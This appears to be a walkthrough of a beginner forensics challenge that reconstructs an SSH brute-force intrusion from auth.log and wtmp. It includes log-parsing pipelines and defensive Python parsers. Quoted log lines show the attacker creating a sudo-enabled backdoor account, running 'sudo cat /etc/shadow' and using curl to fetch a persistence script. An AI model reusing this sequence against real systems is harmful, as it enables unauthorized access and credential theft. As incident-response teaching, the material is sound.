Sherlock Scenario
In this very easy Sherlock, you will familiarize yourself with Unix auth.log and wtmp logs. We'll explore a scenario where a Confluence server was brute-forced via its SSH service. After gaining access to the server, the attacker performed additional activities, which we can track using auth.log. Although auth.log is primarily used for brute-force analysis, we will delve into the full potential of this artifact in our investigation, including aspects of privilege escalation, persistence, and even some visibility into command execution.
Prerequisites
auth.log
auth.log is a text log that records successful and failed logins, sudo and su attempts, and other authentication events. It is stored at /var/log/auth.log or /var/log/secure.
RFC 5424
Each line has the format:
<Timestamp> <Hostname> <Service>[<process_id>]: <Message>
For example:
Mar 6 06:18:01 ip-172-31-35-28 CRON[1119]: pam_unix(cron:session): session opened for user confluence(uid=998) by (uid=0)
The date is March 6, 06:18:01. The hostname is ip-172-31-35-28. The service is cron, with process ID (pid) 1119. The root user is running a cron job as the confluence user (uid 998).
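An added example (my code, not part of this writeup): a Python parser for the line format just described. The pid is kept optional, because sudo entries (seen later on this page) are written as sudo: <user> : ... with no pid, and the month/day match accepts the two-space padding syslog uses for single-digit days. The sample lines are the ones quoted on this page.

```python
import re
from collections import Counter

# One auth.log line: <Timestamp> <Hostname> <Service>[<pid>]: <Message>
# The "[pid]" part is optional: entries written by sudo ("sudo: user : ...")
# carry no pid. "\s+" after the month accepts both "Mar 6" and the
# two-space padding "Mar  6" that syslog writes for single-digit days.
LINE_RE = re.compile(
    r"^(?P<month>[A-Z][a-z]{2})\s+(?P<day>\d{1,2}) (?P<time>\d{2}:\d{2}:\d{2}) "
    r"(?P<host>\S+) (?P<service>[^\[:\s]+)(?:\[(?P<pid>\d+)\])?: (?P<message>.*)$"
)


def parse_line(line):
    """Split one auth.log line into its fields, or return None if it does not match."""
    m = LINE_RE.match(line.rstrip("\n"))
    if not m:
        return None
    rec = m.groupdict()
    rec["day"] = int(rec["day"])
    rec["pid"] = int(rec["pid"]) if rec["pid"] is not None else None
    return rec


def service_counts(lines):
    """Count lines per logging service (the Python equivalent of the cut/sort/uniq pipeline)."""
    counts = Counter()
    for line in lines:
        rec = parse_line(line)
        if rec is not None:
            counts[rec["service"]] += 1
    return counts


# Sample input taken from the log excerpts quoted in this writeup.
SAMPLE_LINES = [
    "Mar 6 06:18:01 ip-172-31-35-28 CRON[1119]: pam_unix(cron:session): session opened for user confluence(uid=998) by (uid=0)",
    "Mar  6 06:19:54 ip-172-31-35-28 sshd[1465]: Accepted password for root from 203.101.190.9 port 42825 ssh2",
    "Mar 6 06:19:54 ip-172-31-35-28 sshd[1465]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)",
    "Mar 6 06:31:40 ip-172-31-35-28 systemd-logind[411]: New session 34 of user root.",
    "Mar 6 06:37:57 ip-172-31-35-28 sudo: cyberjunkie : TTY=pts/1 ; PWD=/home/cyberjunkie ; USER=root ; COMMAND=/usr/bin/cat /etc/shadow",
]

if __name__ == "__main__":
    for service, n in service_counts(SAMPLE_LINES).most_common():
        print(f"{n:>4} {service}")
```

Feed it a real file with `service_counts(open("/var/log/auth.log"))` to reproduce the sshd/CRON tally shown below; lines that do not match the pattern are skipped rather than raising.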
wtmp
wtmp is one of the three files on a Linux system that record login and logout events. /var/run/utmp records the users currently logged in. /var/log/wtmp keeps the history of login and logout activity. /var/log/btmp records failed login attempts.
The data is stored in binary format, so it has to be read with command-line tools such as last and who. last reads wtmp; lastb reads btmp.
The file can be dumped with the utmpdump command:
# install the command
sudo apt install util-linux
Get the service types and sort them by count:
cut -d[ -f1 auth.log | cut -d' ' -f6 | sort | uniq -c | sort -nr
257 sshd
104 CRON
8 systemd-logind
Mostly the sshd and cron services.
SSH login failures
The log for a successful root login (a legitimate one) looks like this (the login came from IP address 203.101.190.9):
Mar 6 06:19:52 ip-172-31-35-28 sshd[1465]: AuthorizedKeysCommand /usr/share/ec2-instance-connect/eic_run_authorized_keys root SHA256:4vycLsDMzI+hyb9OP3wd18zIpyTqJmRq/QIZaLNrg8A failed, status 22
Mar 6 06:19:54 ip-172-31-35-28 sshd[1465]: Accepted password for root from 203.101.190.9 port 42825 ssh2
Mar 6 06:19:54 ip-172-31-35-28 sshd[1465]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)
Then the failed-login entries:
Mar 6 06:31:31 ip-172-31-35-28 sshd[2325]: Invalid user admin from 65.2.161.68 port 46380
Mar 6 06:31:31 ip-172-31-35-28 sshd[2325]: Received disconnect from 65.2.161.68 port 46380:11: Bye Bye [preauth]
Mar 6 06:31:31 ip-172-31-35-28 sshd[2325]: Disconnected from invalid user admin 65.2.161.68 port 46380 [preauth]
Mar 6 06:31:31 ip-172-31-35-28 sshd[620]: error: beginning MaxStartups throttling
The login used the username admin, but no user admin exists on the system.
Extract the usernames used in the failed logins:
grep -i failed auth.log | awk -F'for ' '{print $2}' | awk -F'from' '{print $1}' | sort | uniq -c | sort -nr| sed '$d'
12 invalid user server_adm
11 invalid user svc_account
10 invalid user admin
9 backup
6 root
backup and root are legitimate users.
SSH login successes
$ cat auth.log | grep Accepted
Mar 6 06:19:54 ip-172-31-35-28 sshd[1465]: Accepted password for root from 203.101.190.9 port 42825 ssh2
Mar 6 06:31:40 ip-172-31-35-28 sshd[2411]: Accepted password for root from 65.2.161.68 port 34782 ssh2
Mar 6 06:32:44 ip-172-31-35-28 sshd[2491]: Accepted password for root from 65.2.161.68 port 53184 ssh2
Mar 6 06:37:34 ip-172-31-35-28 sshd[2667]: Accepted password for cyberjunkie from 65.2.161.68 port 43260 ssh2
Four successful logins in total; the first is the legitimate login, and the second is the one the brute force got through with.
Task 1
Analyzing the auth.log, can you identify the IP address used by the attacker to carry out the brute-force attack?
$ grep -Eo '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' auth.log | sort | uniq -c | sort -nr
210 65.2.161.68
4 65.2.161.68
1 203.101.190.9
1 172.31.35.28
A large number of connections come from IP 65.2.161.68:
pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=65.2.161.68
Taken together with the auth.log entries, this IP was carrying out the brute-force attack.
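As an added example (my code, not part of this writeup), a Python script that does the same attribution as the grep pipelines above but keeps the per-IP failure count and the set of usernames tried together, and flags any accepted login from an IP that had already failed, which is what distinguishes the legitimate login from 203.101.190.9 from the brute-forced one. The sample lines are taken from the excerpts on this page, plus two constructed "Failed password" lines (pids 2325 and 2340) standing in for attempts the page only summarizes.

```python
import re
from collections import Counter, defaultdict

IP = r"(?P<ip>\d{1,3}(?:\.\d{1,3}){3})"
# Message patterns sshd writes for the three events that matter for brute-force triage.
FAILED_RE = re.compile(r"Failed password for (?:invalid user )?(?P<user>\S+) from " + IP)
INVALID_RE = re.compile(r"Invalid user (?P<user>\S+) from " + IP)
ACCEPTED_RE = re.compile(r"Accepted (?P<method>\w+) for (?P<user>\S+) from " + IP + r" port (?P<port>\d+)")
TIME_RE = re.compile(r"^\w{3}\s+\d{1,2} (\d{2}:\d{2}:\d{2})")


def analyze_ssh_auth(lines):
    """Attribute SSH authentication events to their source IPs.

    Returns (failed attempts per IP, usernames tried per IP, accepted logins).
    Each accepted login records how many failures the same IP had produced
    before it; a non-zero value is the signature of a brute force that got in."""
    failed_by_ip = Counter()
    users_by_ip = defaultdict(set)
    logins = []
    for line in lines:
        t = TIME_RE.match(line)
        when = t.group(1) if t else None
        if m := FAILED_RE.search(line):
            failed_by_ip[m["ip"]] += 1
            users_by_ip[m["ip"]].add(m["user"])
        elif m := INVALID_RE.search(line):
            # "Invalid user" lines name accounts that do not exist on the box
            users_by_ip[m["ip"]].add(m["user"])
        elif m := ACCEPTED_RE.search(line):
            logins.append({
                "time": when, "user": m["user"], "ip": m["ip"],
                "port": int(m["port"]), "method": m["method"],
                "after_failures": failed_by_ip[m["ip"]],  # Counter returns 0 for unseen IPs
            })
    return failed_by_ip, users_by_ip, logins


def suspicious_logins(logins):
    """Accepted logins from an IP that had already failed at least once."""
    return [login for login in logins if login["after_failures"] > 0]


# Sample input: lines quoted in this writeup plus two constructed "Failed password"
# lines (pids 2325 and 2340) standing in for attempts the page only summarizes.
SAMPLE_LINES = [
    "Mar 6 06:19:54 ip-172-31-35-28 sshd[1465]: Accepted password for root from 203.101.190.9 port 42825 ssh2",
    "Mar 6 06:31:31 ip-172-31-35-28 sshd[2325]: Invalid user admin from 65.2.161.68 port 46380",
    "Mar 6 06:31:33 ip-172-31-35-28 sshd[2325]: Failed password for invalid user admin from 65.2.161.68 port 46380 ssh2",
    "Mar 6 06:31:35 ip-172-31-35-28 sshd[2340]: Failed password for backup from 65.2.161.68 port 46412 ssh2",
    "Mar 6 06:31:39 ip-172-31-35-28 sshd[2409]: Failed password for root from 65.2.161.68 port 46890 ssh2",
    "Mar 6 06:31:40 ip-172-31-35-28 sshd[2411]: Accepted password for root from 65.2.161.68 port 34782 ssh2",
]

if __name__ == "__main__":
    failed, users, logins = analyze_ssh_auth(SAMPLE_LINES)
    for ip, n in failed.most_common():
        print(f"{n:>4} failures from {ip}, usernames tried: {sorted(users[ip])}")
    for login in suspicious_logins(logins):
        print(f"{login['time']} {login['user']} from {login['ip']} accepted after {login['after_failures']} failures")
```

The grep -Eo count above includes every line carrying the IP, including the pam_unix "authentication failure" lines; this script counts only sshd's "Failed password" lines, so the number is smaller but maps one-to-one to password attempts.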
Task 2
The brute-force attempts were successful, and the attacker gained access to an account on the server. What is the username of this account?
$ cat auth.log | grep Accepted -C 5
Mar 6 06:31:40 ip-172-31-35-28 sshd[2411]: Accepted password for root from 65.2.161.68 port 34782 ssh2
Mar 6 06:31:40 ip-172-31-35-28 sshd[2411]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)
Mar 6 06:31:40 ip-172-31-35-28 systemd-logind[411]: New session 34 of user root.
So the account the brute force logged in to is root.
Task 3
Can you identify the timestamp when the attacker manually logged in to the server to carry out their objectives?
Look at the login records for the attacker's IP address 65.2.161.68:
$ utmpdump wtmp | grep root | grep '65.2.161.68'
Utmp dump of wtmp
[7] [02549] [ts/1] [root ] [pts/1 ] [65.2.161.68 ] [65.2.161.68 ] [2024-03-06T06:32:45,387923+00:00]
The time is 2024-03-06 06:32:45.
Cross-check this against the information in auth.log:
$ cat auth.log | grep Accepted -C 5
// brute force succeeded
Mar 6 06:31:39 ip-172-31-35-28 sshd[2409]: Failed password for root from 65.2.161.68 port 46890 ssh2
Mar 6 06:31:40 ip-172-31-35-28 sshd[2411]: Accepted password for root from 65.2.161.68 port 34782 ssh2
Mar 6 06:31:40 ip-172-31-35-28 sshd[2411]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)
Mar 6 06:31:40 ip-172-31-35-28 systemd-logind[411]: New session 34 of user root.
// manual login succeeded
Mar 6 06:32:39 ip-172-31-35-28 sshd[620]: exited MaxStartups throttling after 00:01:08, 21 connections dropped
Mar 6 06:32:44 ip-172-31-35-28 sshd[2491]: Accepted password for root from 65.2.161.68 port 53184 ssh2
Mar 6 06:32:44 ip-172-31-35-28 sshd[2491]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)
Mar 6 06:32:44 ip-172-31-35-28 systemd-logind[411]: New session 37 of user root.
The time is 2024-03-06 06:32:44.
Q: Why do the auth.log and wtmp times differ?
A: auth.log records the moment the SSH connection to the box is initiated and authentication begins. Once authentication succeeds, a terminal is started for the user's interactive session, and that is what wtmp records.
Task 4
SSH login sessions are tracked and assigned a session number upon login. What is the session number assigned to the attacker's session for the user account from Question 2?
37
// brute force succeeded
Mar 6 06:31:39 ip-172-31-35-28 sshd[2409]: Failed password for root from 65.2.161.68 port 46890 ssh2
Mar 6 06:31:40 ip-172-31-35-28 sshd[2411]: Accepted password for root from 65.2.161.68 port 34782 ssh2
Mar 6 06:31:40 ip-172-31-35-28 sshd[2411]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)
Mar 6 06:31:40 ip-172-31-35-28 systemd-logind[411]: New session 34 of user root.
// manual login succeeded
Mar 6 06:32:39 ip-172-31-35-28 sshd[620]: exited MaxStartups throttling after 00:01:08, 21 connections dropped
Mar 6 06:32:44 ip-172-31-35-28 sshd[2491]: Accepted password for root from 65.2.161.68 port 53184 ssh2
Mar 6 06:32:44 ip-172-31-35-28 sshd[2491]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)
Mar 6 06:32:44 ip-172-31-35-28 systemd-logind[411]: New session 37 of user root.
The user that logged in successfully in Task 2 is root, and the session number assigned after the brute force succeeded is 34 (==a bit of doubt here: the answer is 37, which must refer to the session number of the manual root login==).
Task 5
The attacker added a new user to the server as part of their persistence strategy and granted the new user account higher privileges. What is the name of this account?
$ cat auth.log | grep add
Mar 6 06:34:18 ip-172-31-35-28 groupadd[2586]: group added to /etc/group: name=cyberjunkie, GID=1002
Mar 6 06:34:18 ip-172-31-35-28 groupadd[2586]: group added to /etc/gshadow: name=cyberjunkie
Mar 6 06:34:18 ip-172-31-35-28 groupadd[2586]: new group: name=cyberjunkie, GID=1002
Mar 6 06:34:18 ip-172-31-35-28 useradd[2592]: new user: name=cyberjunkie, UID=1002, GID=1002, home=/home/cyberjunkie, shell=/bin/bash, from=/dev/pts/1
Mar 6 06:35:15 ip-172-31-35-28 usermod[2628]: add 'cyberjunkie' to group 'sudo'
Mar 6 06:35:15 ip-172-31-35-28 usermod[2628]: add 'cyberjunkie' to shadow group 'sudo'
A user and a group, both named cyberjunkie, were added, and the user was put into the sudo group.
Task 6
What is the MITRE ATT&CK sub-technique ID used for persistence?
Creating an account is a persistence technique in the MITRE ATT&CK matrix: Create Account
T1136.001
Task 7
Based on the previously confirmed authentication time and the session end in auth.log, how long did the attacker's first SSH session last? (in seconds)
Reading down from session 37: a user was added during the session, and after the disconnect the attacker logged in again as the newly created user.
Mar 6 06:37:24 ip-172-31-35-28 sshd[2491]: Received disconnect from 65.2.161.68 port 53184:11: disconnected by user
Mar 6 06:37:24 ip-172-31-35-28 sshd[2491]: Disconnected from user root 65.2.161.68 port 53184
Start time 06:32:45, end time 06:37:24, 279 s in total.
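The pairing of sshd pid, Accepted line, systemd-logind session number and disconnect line used across Tasks 3, 4 and 7, carried out in Python as an added example (my code, not from the writeup). Sample lines are the excerpts quoted on this page; the year 2024 is taken from the wtmp dump, since auth.log timestamps carry none. Measured from the auth.log acceptance line (06:32:44) the session is 280 s; the Sherlock's answer of 279 s starts from the wtmp time 06:32:45, one second later, for the reason given in the Q/A under Task 3.

```python
import re
from datetime import datetime

# Header of an sshd / systemd-logind line; the timestamp carries no year, so the
# caller supplies it (2024 here, taken from the wtmp dump quoted above).
HEAD_RE = re.compile(
    r"^(?P<mon>\w{3})\s+(?P<day>\d{1,2}) (?P<time>\d{2}:\d{2}:\d{2}) \S+ "
    r"(?P<svc>[\w-]+)\[(?P<pid>\d+)\]: (?P<msg>.*)$"
)
ACCEPT_RE = re.compile(r"Accepted \w+ for (?P<user>\S+) from (?P<ip>\S+) port (?P<port>\d+)")
NEWSESS_RE = re.compile(r"New session (?P<no>\d+) of user (?P<user>\S+)\.")
DISC_RE = re.compile(r"(?:Disconnected from user \S+|Received disconnect from) (?P<ip>\S+) port (?P<port>\d+)")


def ssh_sessions(lines, year):
    """Reconstruct SSH sessions keyed by the sshd child pid.

    The pid in sshd[<pid>] ties the Accepted line to the later disconnect line of
    the same connection; systemd-logind's "New session N" line is attached to the
    still-unnumbered session of that user accepted in the same second."""
    sessions = {}
    for line in lines:
        h = HEAD_RE.match(line)
        if not h:
            continue
        ts = datetime.strptime(f"{year} {h['mon']} {h['day']} {h['time']}", "%Y %b %d %H:%M:%S")
        pid, msg = int(h["pid"]), h["msg"]
        if h["svc"] == "sshd":
            if m := ACCEPT_RE.search(msg):
                sessions[pid] = {"pid": pid, "user": m["user"], "ip": m["ip"], "port": int(m["port"]),
                                 "start": ts, "end": None, "session_no": None, "duration_s": None}
            elif DISC_RE.search(msg) and pid in sessions and sessions[pid]["end"] is None:
                # first disconnect line for this pid closes the session; the second is ignored
                s = sessions[pid]
                s["end"] = ts
                s["duration_s"] = int((ts - s["start"]).total_seconds())
        elif h["svc"] == "systemd-logind":
            if m := NEWSESS_RE.search(msg):
                for s in sessions.values():
                    if s["session_no"] is None and s["user"] == m["user"] and s["start"] == ts:
                        s["session_no"] = int(m["no"])
                        break
    return sorted(sessions.values(), key=lambda s: s["start"])


# Sample input: the auth.log excerpts quoted under Tasks 3, 4 and 7 of this writeup.
SAMPLE_LINES = [
    "Mar 6 06:31:39 ip-172-31-35-28 sshd[2409]: Failed password for root from 65.2.161.68 port 46890 ssh2",
    "Mar 6 06:31:40 ip-172-31-35-28 sshd[2411]: Accepted password for root from 65.2.161.68 port 34782 ssh2",
    "Mar 6 06:31:40 ip-172-31-35-28 sshd[2411]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)",
    "Mar 6 06:31:40 ip-172-31-35-28 systemd-logind[411]: New session 34 of user root.",
    "Mar 6 06:32:39 ip-172-31-35-28 sshd[620]: exited MaxStartups throttling after 00:01:08, 21 connections dropped",
    "Mar 6 06:32:44 ip-172-31-35-28 sshd[2491]: Accepted password for root from 65.2.161.68 port 53184 ssh2",
    "Mar 6 06:32:44 ip-172-31-35-28 sshd[2491]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)",
    "Mar 6 06:32:44 ip-172-31-35-28 systemd-logind[411]: New session 37 of user root.",
    "Mar 6 06:37:24 ip-172-31-35-28 sshd[2491]: Received disconnect from 65.2.161.68 port 53184:11: disconnected by user",
    "Mar 6 06:37:24 ip-172-31-35-28 sshd[2491]: Disconnected from user root 65.2.161.68 port 53184",
]

if __name__ == "__main__":
    for s in ssh_sessions(SAMPLE_LINES, 2024):
        print(f"pid {s['pid']} session {s['session_no']} {s['user']}@{s['ip']}:{s['port']} "
              f"start {s['start']} end {s['end']} duration {s['duration_s']}")
```

A session with end None is one the log never closed in the window you fed in (here pid 2411, the brute-force tool's own connection), which is itself worth noting during triage.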
Task 8
The attacker logged in to their backdoor account and used their higher privileges to download a script. What is the full command executed using sudo?
After logging in as the newly created user, they first viewed the contents of /etc/shadow, then started downloading something.
The common download commands on Linux are wget and curl.
Mar 6 06:37:57 ip-172-31-35-28 sudo: cyberjunkie : TTY=pts/1 ; PWD=/home/cyberjunkie ; USER=root ; COMMAND=/usr/bin/cat /etc/shadow
$ cat auth.log | grep -E '(wget|curl)'
Mar 6 06:39:38 ip-172-31-35-28 sudo: cyberjunkie : TTY=pts/1 ; PWD=/home/cyberjunkie ; USER=root ; COMMAND=/usr/bin/curl https://raw.githubusercontent.com/montysecurity/linper/main/linper.sh
/usr/bin/curl https://raw.githubusercontent.com/montysecurity/linper/main/linper.sh
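A timeline builder for the persistence and sudo activity covered by Tasks 5 and 8, added here as an example (my code, not part of the writeup). It parses useradd, usermod and sudo entries and tags privileged commands that read credential files or fetch content with curl or wget, so the two commands the tasks ask about surface without grepping for each tool by hand. The sample lines are the ones quoted on this page; the tag names and the sensitive-file list are my own choices.

```python
import re
import shlex

USERADD_RE = re.compile(
    r"useradd\[\d+\]: new user: name=(?P<name>[^,]+), UID=(?P<uid>\d+), GID=\d+, "
    r"home=(?P<home>[^,]+), shell=(?P<shell>[^,]+)"
)
USERMOD_RE = re.compile(r"usermod\[\d+\]: add '(?P<name>[^']+)' to group '(?P<group>[^']+)'")
SUDO_RE = re.compile(
    r" sudo: +(?P<user>\S+) : TTY=(?P<tty>\S+) ; PWD=(?P<pwd>\S+) ; USER=(?P<target>\S+) ; COMMAND=(?P<cmd>.*)$"
)
TIME_RE = re.compile(r"^\w{3}\s+\d{1,2} (\d{2}:\d{2}:\d{2})")

# Review heuristics (my own choice, not from the Sherlock): credential-file reads and
# network downloads run through sudo are the commands to look at first.
SENSITIVE_FILES = {"/etc/shadow", "/etc/gshadow", "/etc/sudoers"}
DOWNLOADERS = {"curl", "wget"}


def classify_command(cmd):
    """Tag a sudo COMMAND string; an empty set means nothing noteworthy."""
    argv = shlex.split(cmd)
    tags = set()
    if not argv:
        return tags
    if argv[0].rsplit("/", 1)[-1] in DOWNLOADERS:
        tags.add("download")
    if any(arg in SENSITIVE_FILES for arg in argv[1:]):
        tags.add("credential-read")
    return tags


def persistence_timeline(lines):
    """Collect account creation, sudo-group grants and sudo command executions in log order."""
    new_users, sudo_grants, commands = [], [], []
    for line in lines:
        t = TIME_RE.match(line)
        when = t.group(1) if t else None
        if m := USERADD_RE.search(line):
            new_users.append({"time": when, "name": m["name"], "uid": int(m["uid"]),
                              "home": m["home"], "shell": m["shell"]})
        elif m := USERMOD_RE.search(line):
            # usermod also logs "to shadow group 'sudo'"; that wording does not match, so
            # each grant is recorded once
            if m["group"] == "sudo":
                sudo_grants.append({"time": when, "name": m["name"]})
        elif m := SUDO_RE.search(line):
            commands.append({"time": when, "user": m["user"], "as": m["target"], "pwd": m["pwd"],
                             "cmd": m["cmd"], "tags": classify_command(m["cmd"])})
    return {"new_users": new_users, "sudo_grants": sudo_grants, "commands": commands}


# Sample input: the useradd/usermod/sudo lines quoted under Tasks 5 and 8 of this writeup.
SAMPLE_LINES = [
    "Mar 6 06:34:18 ip-172-31-35-28 groupadd[2586]: new group: name=cyberjunkie, GID=1002",
    "Mar 6 06:34:18 ip-172-31-35-28 useradd[2592]: new user: name=cyberjunkie, UID=1002, GID=1002, home=/home/cyberjunkie, shell=/bin/bash, from=/dev/pts/1",
    "Mar 6 06:35:15 ip-172-31-35-28 usermod[2628]: add 'cyberjunkie' to group 'sudo'",
    "Mar 6 06:35:15 ip-172-31-35-28 usermod[2628]: add 'cyberjunkie' to shadow group 'sudo'",
    "Mar 6 06:37:57 ip-172-31-35-28 sudo: cyberjunkie : TTY=pts/1 ; PWD=/home/cyberjunkie ; USER=root ; COMMAND=/usr/bin/cat /etc/shadow",
    "Mar 6 06:39:38 ip-172-31-35-28 sudo: cyberjunkie : TTY=pts/1 ; PWD=/home/cyberjunkie ; USER=root ; COMMAND=/usr/bin/curl https://raw.githubusercontent.com/montysecurity/linper/main/linper.sh",
]

if __name__ == "__main__":
    tl = persistence_timeline(SAMPLE_LINES)
    for u in tl["new_users"]:
        print(f"{u['time']} new user {u['name']} uid={u['uid']} shell={u['shell']}")
    for g in tl["sudo_grants"]:
        print(f"{g['time']} {g['name']} added to sudo")
    for c in tl["commands"]:
        print(f"{c['time']} {c['user']} as {c['as']}: {c['cmd']} {sorted(c['tags']) or ''}")
```

Because the timeline is ordered as the log is, the sequence new user, sudo grant, credential read, download reads off directly as the persistence-then-escalation story the Sherlock describes.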